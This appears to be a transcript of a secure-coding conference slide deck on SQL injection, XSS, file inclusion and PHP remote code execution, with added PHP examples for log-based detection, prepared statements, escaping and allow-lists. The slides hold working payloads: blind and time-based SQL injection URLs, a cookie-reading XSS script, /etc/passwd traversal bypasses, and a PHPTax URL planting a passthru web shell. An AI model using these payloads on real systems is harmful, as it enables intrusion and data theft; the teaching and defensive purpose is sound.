Hack and Slash: Secure Coding


OWASP and 2600 Thailand

Published in: Technology
  1. Hack and Slash: Secure Coding
     Krit Kadnok, Prathan Phongthiproek
  2. The Most Common Vulnerabilities
     • SQL Injection
     • Cross Site Scripting (XSS)
     • File Inclusion
     • Remote Code Execution
  3. SQL Injection
     • SQL Injection
     • Blind SQL Injection
  4. SQL Injection (Cont.)
     If the user enters: ' UNION SELECT ALL user(), database() #
  5. Blind SQL Injection
     • Normal Blind - you get TRUE/FALSE responses based on the output of the SQL query. This is a visible change in the page.
     • Totally Blind - no change in the output for a TRUE/FALSE condition.
  6. Normal Blind
     Vulnerable URL: http://site/vulnerabilities/sqli_blind/?id=1
     TRUE response:  http://site/vulnerabilities/sqli_blind/?id=1 AND 1=1
     FALSE response: http://site/vulnerabilities/sqli_blind/?id=1 AND 1=2
     Check version:
     FALSE response: http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=4
     TRUE response:  http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=5
  7. Totally Blind
     As this type does not give any TRUE/FALSE response, we need to use time-based injection: use IF() for the condition and BENCHMARK() for the time delay.
     Check version:
     FALSE response: http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD5(CHAR(1))),null),null
     TRUE response:  http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null
     Table name guessing: http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING((select 1 from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null),null
  8. Blind SQL Injection
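The probes on slides 6 and 7 leave a recognisable trail in web-server logs. The snippet below is an added detection example, not part of the deck: it parses constructed combined-format log lines and flags the boolean (AND 1=2), version-probe and BENCHMARK() time-delay patterns the slides use. The signature names and both functions are my own.

```php
<?php
// Added example, not from the deck: flag blind-SQLi probes in access-log lines.
declare(strict_types=1);
// Constructed sample lines (Apache combined-log style); the server records the
// query string URL-encoded, so %20 stands for the spaces in the slide URLs.
$logLines = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /vulnerabilities/sqli_blind/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /vulnerabilities/sqli_blind/?id=1%20AND%201=2 HTTP/1.1" 200 498',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /vulnerabilities/sqli_blind/?id=1%20AND%20substring(version(),1,1)=5 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /vulnerabilities/sqli_blind/?id=1%20UNION%20SELECT%20IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:00:10 +0000] "GET /products/?id=42&sort=name HTTP/1.1" 200 2048',
];
// Signatures, applied to the URL-decoded query string. The names are my own.
$signatures = [
    'boolean-blind' => '/\bAND\s+\d+\s*=\s*\d+\b/i',             // ... AND 1=1 / AND 1=2
    'version-probe' => '/\bsubstring\s*\(\s*version\s*\(\s*\)/i', // substring(version(),1,1)=N
    'time-based'    => '/\b(BENCHMARK|SLEEP)\s*\(/i',            // BENCHMARK(5000000, ...)
    'union-select'  => '/\bUNION\s+(ALL\s+)?SELECT\b/i',
];

/** Decoded query string of the request in a combined-log line, or null if none. */
function extractQuery(string $line): ?string {
    if (!preg_match('/"(?:GET|POST)\s+\S*?\?(\S*)\s+HTTP\//', $line, $m)) {
        return null;
    }
    return urldecode($m[1]);
}

/** Map line index => matched signature names, only for lines that matched. */
function scanLog(array $lines, array $signatures): array {
    $hits = [];
    foreach ($lines as $i => $line) {
        $query = extractQuery($line);
        if ($query === null) continue;          // no query string, nothing to inspect
        $matched = [];
        foreach ($signatures as $name => $regex) {
            if (preg_match($regex, $query) === 1) $matched[] = $name;
        }
        if ($matched !== []) $hits[$i] = $matched;
    }
    return $hits;
}

foreach (scanLog($logLines, $signatures) as $i => $names) {
    echo "line $i: " . implode(', ', $names) . "\n";
}
```

The BENCHMARK() probe is also visible as a request that took seconds longer than its neighbours, so pairing these signatures with the response-time field of the log catches payloads that a regex misses.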
  9. Case Study: PHD Helpdesk 2.12 SQLi Vulnerability (login.php)
  10. Case Study: PHD Helpdesk 2.12 SQLi Vulnerability
      Submit POST data to login.php; result.
  11. Mitigation/Prevention
      • Use of Prepared Statements (Parameterized Queries)
      • Use of Stored Procedures
      • Escaping all User Supplied Input
      • Least Privilege
      • White List Input Validation
      https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
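The login.php pattern beside its fix, as an added example (not the PHD Helpdesk code): the string-built lookup returns a row for a quote-breaking name, the prepared-statement version does not, and the whitelist check in front of it rejects the value before it reaches the database. It uses PDO with an in-memory SQLite table constructed here; the function names are my own.

```php
<?php
// Added example, not the PHD Helpdesk code: a string-built login lookup beside a
// parameterized one, run against a constructed in-memory SQLite table via PDO.
declare(strict_types=1);

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)');
$pdo->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)')
    ->execute(['alice', password_hash('correct horse battery staple', PASSWORD_DEFAULT)]);

// Vulnerable: the submitted name is spliced into the SQL text, so a quote in it
// changes the query itself (the pattern behind the login.php case study).
function findUserVulnerable(PDO $pdo, string $username): ?string {
    $sql = "SELECT username FROM users WHERE username = '$username'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['username'];
}

// Fixed: a prepared statement sends the SQL and the value separately, so the value
// can only ever be compared as data, whatever characters it contains.
function findUserSafe(PDO $pdo, string $username): ?string {
    $stmt = $pdo->prepare('SELECT username FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['username'];
}

// Whitelist validation in front of the query, as the slide also recommends: reject
// anything that is not a plausible account name before it touches the database.
function isValidUsername(string $username): bool {
    return preg_match('/^[A-Za-z0-9_.-]{1,32}$/', $username) === 1;
}

// Constructed inputs: a real account name and a quote-breaking string.
foreach (['alice', "' OR 1=1 --"] as $input) {
    $safe = isValidUsername($input) ? findUserSafe($pdo, $input) : null;
    printf("%-12s vulnerable=%s safe=%s\n", $input,
        var_export(findUserVulnerable($pdo, $input), true), var_export($safe, true));
}
```

Least privilege from the same slide is applied outside the code: the account the application connects with should only be able to SELECT from the tables the login needs.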
  12. Cross Site Scripting (XSS)
      • XSS Reflected
      • XSS Stored
  13. XSS Reflected: <script>alert(document.cookie)</script>
  14. XSS Stored: <script>alert(document.cookie)</script>
  15. Mitigation/Prevention
      • Escape before inserting untrusted data into an HTML context
      • Positive or "whitelist" input validation is also recommended
      • Use the HttpOnly cookie flag
      https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
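The two mitigations on this slide in code, as an added example (not from the deck): the stored payload from slide 14 rendered raw, then encoded for the HTML context and for a JavaScript-string context, plus the session cookie set with HttpOnly. The cookie name, session id and function names are my own.

```php
<?php
// Added example, not from the deck: encode untrusted data for the context it lands
// in, and set the session cookie HttpOnly so document.cookie cannot read it.
declare(strict_types=1);

// Constructed stored comment, the payload shown on the XSS slides.
$untrusted = '<script>alert(document.cookie)</script>';

// Vulnerable: the value is written into the page unchanged, so the browser runs it.
function renderVulnerable(string $comment): string {
    return "<div class=\"comment\">$comment</div>";
}

// HTML body/attribute context: htmlspecialchars with ENT_QUOTES turns < > & " ' into
// entities, so the data can no longer start a tag or leave an attribute.
function escapeHtml(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}
function renderSafe(string $comment): string {
    return '<div class="comment">' . escapeHtml($comment) . '</div>';
}

// JavaScript string context (data handed to a script): JSON-encode with the HTML-
// sensitive characters hex-escaped so a "</script>" in the value cannot close the tag.
function toJsString(string $s): string {
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// The flag from the slide (HttpOnly) plus Secure and SameSite; must run before any
// output is sent. Cookie name and session id are placeholders.
function setSessionCookie(string $sessionId): bool {
    return setcookie('SESSIONID', $sessionId, [
        'expires' => 0, 'path' => '/', 'secure' => true,
        'httponly' => true, 'samesite' => 'Strict',
    ]);
}

setSessionCookie(bin2hex(random_bytes(16)));
echo renderVulnerable($untrusted), "\n";
echo renderSafe($untrusted), "\n";
echo 'var comment = ', toJsString($untrusted), ";\n";
```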
  16. File Inclusion
      • Include PHP Shell (RFI)
      • Directory Traversal (LFI)
      • Read Code via PHP Stream Filters (php://filter)
      • Remote Code Execution (LFI to RCE)
      • Etc.
  17. File Inclusion (RFI): RFI does not work!! allow_url_include is disabled.
  18. File Inclusion (LFI): LFI works!!
  19. File Inclusion (PHP Stream): it works!! allow_url_include is disabled.
  20. File Inclusion (PHP Stream)
      <?php
      class Configuration
      {
          public $host = "localhost";
          public $db = "cuppa";
          public $user = "root";
          public $password = "mYDb@dm1n";
          public $table_prefix = "cu_";
          public $administrator_template = "default";
          public $list_limit = 25;
          public $token = "OBqIPqlFWf3X";
          public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
          public $upload_default_path = "media/uploadsFiles";
          public $maximum_file_size = "5242880";
          public $secure_login = 0;
          public $secure_login_value = "";
          public $secure_login_redirect = "";
      }
      ?>
  21. File Inclusion (LFI to RCE)
  22. File Inclusion (Bypass): bad code; bypass it!!
      • Null Byte: ?page=../../../../../../../../../../../etc/passwd%00
      • Path Truncation: ?page=../../../../../../../../../../../etc/passwd.............
      • Dot Truncation: ?page=../../../../../../../../../../../etc/passwd..........................
  23. Case Study: DevalCMS 1.4a (currentfile) LFI Vulnerability
  24. Case Study: DevalCMS 1.4a (currentfile) LFI Vulnerability
  25. Mitigation/Prevention: Whitelist
  26. Remote Code Execution: dangerous functions
      exec, system, passthru, shell_exec, proc_open, pcntl_exec, popen, eval, assert, escapeshellcmd, preg_replace, call_user_func, call_user_func_array, etc.
  27. Remote Code Execution
  28. Remote Code Execution
  29. Remote Code Execution (Bypass): PHPTax Remote Code Execution
      http://localhost/phptax/index.php?newvalue=%3C?php%20passthru%28$_GET[cmd]%29;?%3E&field=rce.php
  30. Remote Code Execution
  31. Remote Code Execution: PHP-Charts 1.0 (type) RCE Vulnerability
  32. Remote Code Execution: PHP-Charts 1.0 (type) RCE Vulnerability
  33. Mitigation/Prevention
      • Ensure that user input is properly validated
      • Limit the use of dynamic input from users in vulnerable functions
      • Build a whitelist of positive file names and code with regular expressions (e.g. alphanumeric only) or arrays
      • Do not try to blacklist "evil" PHP code
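The whitelist called for on slides 25 and 33 in code, as an added example (not from the deck or the CMSes it shows): the include-by-parameter pattern from the bypass slide beside an allow-list lookup that rejects all three bypass strings, and the same allow-list idea applied to a call_user_func() dispatcher. Page and action names, and all function names, are my own.

```php
<?php
// Added example, not from the deck or the CMSes it shows: the include-by-parameter
// pattern beside an allow-list, and the same allow-list idea for dynamic calls.
declare(strict_types=1);

// Bad code, as on the bypass slide: appending ".php" is defeated by %00 and by path
// or dot truncation on old PHP, and ../ still walks up to /etc/passwd.
function includePathVulnerable(string $page): string {
    return __DIR__ . '/pages/' . $page . '.php';   // would be passed to include()
}

// Allow-list: the parameter is a key into a fixed map, never part of a path, so the
// allow_url_include=Off setting that php://filter sidesteps on slide 19 is no longer
// what the include relies on.
const PAGES = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function resolvePage(string $page): ?string {
    if (!array_key_exists($page, PAGES)) {
        return null;   // caller answers 404; the raw value is never used as a path
    }
    return __DIR__ . '/pages/' . PAGES[$page];
}

// Same idea for call_user_func(): map action names to fixed callables and check the
// name against a tight pattern, instead of calling whatever the request names.
const ACTIONS = ['list' => 'actionList', 'show' => 'actionShow'];
function actionList(): string { return 'listing'; }
function actionShow(): string { return 'showing'; }

function dispatch(string $action): ?string {
    if (preg_match('/^[a-z]{1,16}$/', $action) !== 1 || !isset(ACTIONS[$action])) {
        return null;
    }
    return call_user_func(ACTIONS[$action]);
}

// Constructed inputs: a valid key plus the three bypass strings from the slide.
$probes = ['about', "../../../../etc/passwd\0", '../../../../etc/passwd.............',
           '../../../../etc/passwd..........................'];
foreach ($probes as $p) {
    $bad  = substr(includePathVulnerable($p), strlen(__DIR__) + 1);  // relative, for display
    $good = resolvePage($p);
    printf("vulnerable: %-44s allow-list: %s\n", addcslashes($bad, "\0..\37"),
        $good === null ? 'rejected' : basename($good));
}
foreach (['list', 'show', 'system'] as $a) {
    printf("dispatch(%s) => %s\n", $a, dispatch($a) ?? 'rejected');
}
```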
  34. Bug Hunting!!
      • Code review
      • Scan for potentially vulnerable functions
      • Trace back their parameters
      • Free tool!! >> http://sourceforge.net/projects/rips-scanner/
  35. RIPS
  36. Visit => http://www.owasp.org
  37. References
      • http://www.websec.ca/kb/sql_injection
      • https://www.owasp.org/index.php/SQL_Injection
      • https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
      • https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
      • https://www.owasp.org/index.php/PHP_File_Inclusion
      • https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
      • http://www.exploit-db.com
      • http://sourceforge.net/projects/rips-scanner
  38. If someone is still in the room.. THANK YOU